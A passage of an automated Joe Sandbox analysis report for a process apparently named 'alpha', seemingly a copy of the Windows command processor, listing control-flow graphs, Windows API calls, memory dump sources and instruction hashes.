1108->1112 1109->1040 1113 7ff71966c809 1109->1113 1111->1004 1112->1101 1112->1109 1113->1057
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleTitlewcschr
                                                                    • String ID: /$:
                                                                    • API String ID: 2364928044-4222935259
                                                                    • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                    • Instruction ID: a0b246a9261538930a950a759bba8581d210ef4d2a965b26803e90b897afefbe
                                                                    • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                    • Instruction Fuzzy Hash: DAC19F61E08E4281FB64BF25D454279A6B2EF91BB8FC45135DA1E462D9DF3CE84A8330

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1171 7ff719678d80-7ff719678da2 1172 7ff719678da4-7ff719678daf 1171->1172 1173 7ff719678dcc 1172->1173 1174 7ff719678db1-7ff719678db4 1172->1174 1177 7ff719678dd1-7ff719678dd9 1173->1177 1175 7ff719678db6-7ff719678dbd 1174->1175 1176 7ff719678dbf-7ff719678dca Sleep 1174->1176 1175->1177 1176->1172 1178 7ff719678ddb-7ff719678de5 _amsg_exit 1177->1178 1179 7ff719678de7-7ff719678def 1177->1179 1180 7ff719678e4c-7ff719678e54 1178->1180 1181 7ff719678e46 1179->1181 1182 7ff719678df1-7ff719678e0a 1179->1182 1184 7ff719678e56-7ff719678e69 _initterm 1180->1184 1185 7ff719678e73-7ff719678e75 1180->1185 1181->1180 1183 7ff719678e0e-7ff719678e11 1182->1183 1186 7ff719678e38-7ff719678e3a 1183->1186 1187 7ff719678e13-7ff719678e15 1183->1187 1184->1185 1188 7ff719678e77-7ff719678e79 1185->1188 1189 7ff719678e80-7ff719678e88 1185->1189 1186->1180 1190 7ff719678e3c-7ff719678e41 1186->1190 1187->1190 1191 7ff719678e17-7ff719678e1b 1187->1191 1188->1189 1192 7ff719678e8a-7ff719678e98 call 7ff7196794f0 1189->1192 1193 7ff719678eb4-7ff719678ec8 call 7ff7196737d8 1189->1193 1198 7ff719678f28-7ff719678f3d 1190->1198 1195 7ff719678e2d-7ff719678e36 1191->1195 1196 7ff719678e1d-7ff719678e29 1191->1196 1192->1193 1201 7ff719678e9a-7ff719678eaa 1192->1201 1200 7ff719678ecd-7ff719678eda 1193->1200 1195->1183 1196->1195 1203 7ff719678edc-7ff719678ede exit 1200->1203 1204 7ff719678ee4-7ff719678eeb 1200->1204 1201->1193 1203->1204 1205 7ff719678eed-7ff719678ef3 _cexit 1204->1205 1206 7ff719678ef9 1204->1206 1205->1206 1206->1198
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                    • String ID:
                                                                    • API String ID: 4291973834-0
                                                                    • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                    • Instruction ID: f95fefcf2914481de203cd54ef4f083e0ee99bbd84794a41a1c8205764e793eb
                                                                    • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                    • Instruction Fuzzy Hash: 1C410A31A08E038AF654BF10E990675A2B2AF543ACFC40476E91D476A1DF7CEC4A8771

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1207 7ff719674a14-7ff719674a3e GetEnvironmentStringsW 1208 7ff719674aae-7ff719674ac5 1207->1208 1209 7ff719674a40-7ff719674a46 1207->1209 1210 7ff719674a59-7ff719674a8f GetProcessHeap HeapAlloc 1209->1210 1211 7ff719674a48-7ff719674a52 1209->1211 1213 7ff719674a91-7ff719674a9a memmove 1210->1213 1214 7ff719674a9f-7ff719674aa9 FreeEnvironmentStringsW 1210->1214 1211->1211 1212 7ff719674a54-7ff719674a57 1211->1212 1212->1210 1212->1211 1213->1214 1214->1208
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A28
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A66
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A7D
                                                                    • memmove.MSVCRT(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A9A
                                                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674AA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                    • String ID:
                                                                    • API String ID: 1623332820-0
                                                                    • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                    • Instruction ID: 5078a9a7bf8f95425b5f29ba66845dccdb79aa1217f9bded61ccac4e0f5ee07e
                                                                    • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                    • Instruction Fuzzy Hash: 19119122A14B4286DA14AF45B40803DFBB2EB89FE4B899075DE4E03744DE3DE84A8770

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                    • String ID:
                                                                    • API String ID: 1826527819-0
                                                                    • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                    • Instruction ID: 8238b81ecac496d9c1003134b45f19836c3e2ded809b14b6132415a8764b90b5
                                                                    • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                    • Instruction Fuzzy Hash: 39011E31908A82CAE6047F25A455179FA72EB8A769FC461B4E54F06396DF3C944A8730
                                                                    APIs
                                                                      • Part of subcall function 00007FF719671EA0: wcschr.MSVCRT(?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF719690D54), ref: 00007FF719671EB3
                                                                    • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7196692AC), ref: 00007FF7196730CA
                                                                    • SetErrorMode.KERNELBASE ref: 00007FF7196730DD
                                                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7196730F6
                                                                    • SetErrorMode.KERNELBASE ref: 00007FF719673106
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$FullNamePathwcschr
                                                                    • String ID:
                                                                    • API String ID: 1464828906-0
                                                                    • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                    • Instruction ID: b3611080a6e7b5596ba0acd44d9082d13de7d78f3a1a374ff213cfe6e9ec1dc7
                                                                    • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                    • Instruction Fuzzy Hash: 7B31E521A08A1586E629BF15A40047EF672EB45BB8FD49135DA4A473E0DF7DE84F8330
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                    • API String ID: 2221118986-3416068913
                                                                    • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                    • Instruction ID: 190be461f93cd5949cbc3500a92bdab36f0ac5be3180e28360e1b94fd93d19db
                                                                    • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                    • Instruction Fuzzy Hash: 1D11CA21E08F4685EB54EF55E14427992B29F84BB8F944332DE6D4B3D9DD2CD44A4370
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcschr
                                                                    • String ID: 2$COMSPEC
                                                                    • API String ID: 1764819092-1738800741
                                                                    • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                    • Instruction ID: 3ac7342fffc216e6a71d26f0d656ec5bd00e4c5a18815714d66617ffc5756ab0
                                                                    • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                    • Instruction Fuzzy Hash: C8516D21E0CE4285FBA4BF35A451379A2B69F84BECFC44031DA4D466D5DE3CE44A8771
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                    • String ID:
                                                                    • API String ID: 4254246844-0
                                                                    • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                    • Instruction ID: 2bcb4d82657106805a799eaac89e7e87ea78baa96d4d8cd47e9fd64c834975e8
                                                                    • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                    • Instruction Fuzzy Hash: 5141A321A08F4286EE29AF00E455779E7B2EF95BA8FC44531DA4D47794DF3CE44E8630
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$EnvironmentFreeProcessVariable
                                                                    • String ID:
                                                                    • API String ID: 2643372051-0
                                                                    • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                    • Instruction ID: 831651cb5149e61a47b15f4742ac684b1f780fa835ee8fb9853e65ca6fe224e7
                                                                    • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                    • Instruction Fuzzy Hash: BEF08662A19F4285EB04AF66F544079EAF3FF5DBB4B859274C52E03394DE3C944A8230
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _get_osfhandle$ConsoleMode
                                                                    • String ID:
                                                                    • API String ID: 1591002910-0
                                                                    • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                    • Instruction ID: acacac19a16dbcac05c7a602036173054ef49b6fd84bb4f25be5165f6325924a
                                                                    • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                    • Instruction Fuzzy Hash: 86F07A34A09E02CBE604AF11E845578BBB2FB89B69F855574C90E43310DF3DA40A8B30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: DriveType
                                                                    • String ID: :
                                                                    • API String ID: 338552980-336475711
                                                                    • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                    • Instruction ID: 957be06ee0999e4b06f644d179d2ef2d7c5bf27f8d2a5c64844206a5e4aaff33
                                                                    • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                    • Instruction Fuzzy Hash: BFE06576618A4086D7209F54E45106AF7B1FB9D358FC41525E98D83724DB3CD14ACB18
                                                                    APIs
                                                                      • Part of subcall function 00007FF71966CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDA6
                                                                      • Part of subcall function 00007FF71966CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDBD
                                                                    • GetConsoleTitleW.KERNELBASE ref: 00007FF719675B52
                                                                      • Part of subcall function 00007FF719674224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF719674297
                                                                      • Part of subcall function 00007FF719674224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7196742D7
                                                                      • Part of subcall function 00007FF719674224: memset.MSVCRT ref: 00007FF7196742FD
                                                                      • Part of subcall function 00007FF719674224: memset.MSVCRT ref: 00007FF719674368
                                                                      • Part of subcall function 00007FF719674224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF719674380
                                                                      • Part of subcall function 00007FF719674224: wcsrchr.MSVCRT ref: 00007FF7196743E6
                                                                      • Part of subcall function 00007FF719674224: lstrcmpW.KERNELBASE ref: 00007FF719674401
                                                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF719675BC7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                    • String ID:
                                                                    • API String ID: 497088868-0
                                                                    • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                    • Instruction ID: ff41d2acc0a490e9f029f5f6f04b095c7435c9a306d1adb5e36a30f619bca0f0
                                                                    • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                    • Instruction Fuzzy Hash: C1319920A0CE8246FA24FF11A45157DE272AF89BA8FC45035E94E47B95DE3CE50B8730
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_taskmalloc
                                                                    • String ID:
                                                                    • API String ID: 1412018758-0
                                                                    • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                    • Instruction ID: 4b142105635fed63539980decaba9c2fabf23e6b5e929feb2084b91b4f855fc5
                                                                    • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                    • Instruction Fuzzy Hash: B6E06D60F0AE0785FE1C3F62684107892A25F18778E882430DD1D05382EE2CE09B8330
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDA6
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                    • Instruction ID: 5e44d6d3038dfe1fbd5a839f36602276bd9fb1aeb12c33797fd728c707414a77
                                                                    • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                    • Instruction Fuzzy Hash: CDF01932E18B4286EA04AF15F84047CFBB6FB89B65B989435D90E07758DF3CE44AC630
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
